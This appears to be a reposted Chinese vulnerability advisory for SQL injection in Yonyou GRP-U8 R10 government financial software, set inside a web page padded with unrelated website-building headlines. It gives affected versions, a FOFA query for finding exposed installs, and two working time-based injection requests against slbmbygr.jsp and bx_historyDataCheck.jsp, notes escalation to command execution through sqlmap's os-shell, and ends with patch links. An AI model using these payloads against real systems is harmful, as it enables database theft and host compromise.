当前位置: 首页 > news >正文

延吉市网站建设无安全警告的浏览器

延吉市网站建设,无安全警告的浏览器,h5网站建设方案.doc,未备案网站通知0x01 产品简介 用友GRP-U8R10行政事业财务管理软件是用友公司专注于国家电子政务事业#xff0c;基于云计算技术所推出的新一代产品#xff0c;是我国行政事业财务领域最专业的政府财务管理软件。 0x02 漏洞概述 用友GRP-U8的bx_historyDataCheck jsp、slbmbygr.jsp等接口存…0x01 产品简介 用友GRP-U8R10行政事业财务管理软件是用友公司专注于国家电子政务事业基于云计算技术所推出的新一代产品是我国行政事业财务领域最专业的政府财务管理软件。 0x02 漏洞概述 用友GRP-U8的bx_historyDataCheck jsp、slbmbygr.jsp等接口存在SQL注入漏洞由于用友GRP-U8未对用户的输入进行有效的过滤直接将其拼接进了SQL查询语句中导致系统出现SQL注入漏洞进一步利用可造成主机失陷。 0x03 影响范围 用友GRP-U8R10 U8Manager B、C、G 系列产品 20230905 0x04 复现环境 FOFAapp用友-GRP-U8 0x05 漏洞复现 PoC-1 GET /u8qx/slbmbygr.jsp?gsdm1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: your-ip 延时5秒 Sqlmap验证 PoC-2 POST /u8qx/bx_historyDataCheck.jsp HTTP/1.1 Host: your-ip Content-Type: application/x-www-form-urlencodeduserName;WAITFOR DELAY 0:0:6--class.module.classLoader.DefaultAssertionStatus 延时6秒 利用os-shell命令执行 0x06 修复建议 目前官方已发布更新补丁获取安全补丁方式如下 1. 百度云盘https://pan.baidu.com/s/1cQIxlUkpYAxE508EXjgQxA 提取码n1xy 2. 用友云盘https://pan.yonyou.com/s/gUWlv8QkSsY密码a61h 下载【20230905-关于用友GRP-U8 bx_historyDataCheck jsp存在SQL注入漏洞的解决方案.zip】 更新用友GRP-U8 Manager产品的2023年10月份日期大于等于均可标准补丁也可以修复此问题。
http://wiki.neutronadmin.com/news/258791/

相关文章:

  • 上海最专业的网站建设公司做网站域名重要吗
  • 域名解析手机网站建设鼠标垫东莞网站建设
  • 网站建设实训报告册建材网站开发
  • 句容网站建设开发网站建设详细过程
  • 大理做网站哪家好网站投入费用
  • 网站模板手机目前最火的互联网项目
  • 上海营销型网站建设公司网站建设 问卷调查
  • phpcmsv9网站地图西部数码网站备案核验单
  • 网站美化教程下载短网址生成免费
  • 网站模板带后台 下载360投放广告怎么收费
  • 前台网站系统源码三视觉平面设计网
  • 手机网站制作套餐福清市百度seo
  • 网站应如何设计网站为契机建设校园数字化
  • php商务网站开发代码山东展厅设计公司
  • 网站建设费用的账务处理投资5万的小型加工厂
  • 内容网站 如何做采集网站页面排名优化
  • 株洲能建网站的有哪些网站博客程序
  • 做微视频的网站wordpress添加爬虫数据
  • 2008 iis 添加 网站 权限宁远做网站
  • 如何做产品网站网页设计天津海外seo
  • 织梦可以做商城网站吗网站托管共享服务器费用一年多少钱
  • 只用php做网站哪个网站空间好
  • 2017网站设计wordpress模版做网页
  • 做搜狗手机网站优wordpress 3.5 下载
  • 微网站与移动开发是做什么的上海莱布拉网站建设
  • 建论坛网站wordpress增加小工具
  • 广西网站建设公司电话建立网站方法
  • 黄石百度做网站多少钱深圳外企公司排名
  • 广州站在哪里辽宁鞍山刚刚发布
  • 中小学网站建设方案公司网站建设和推广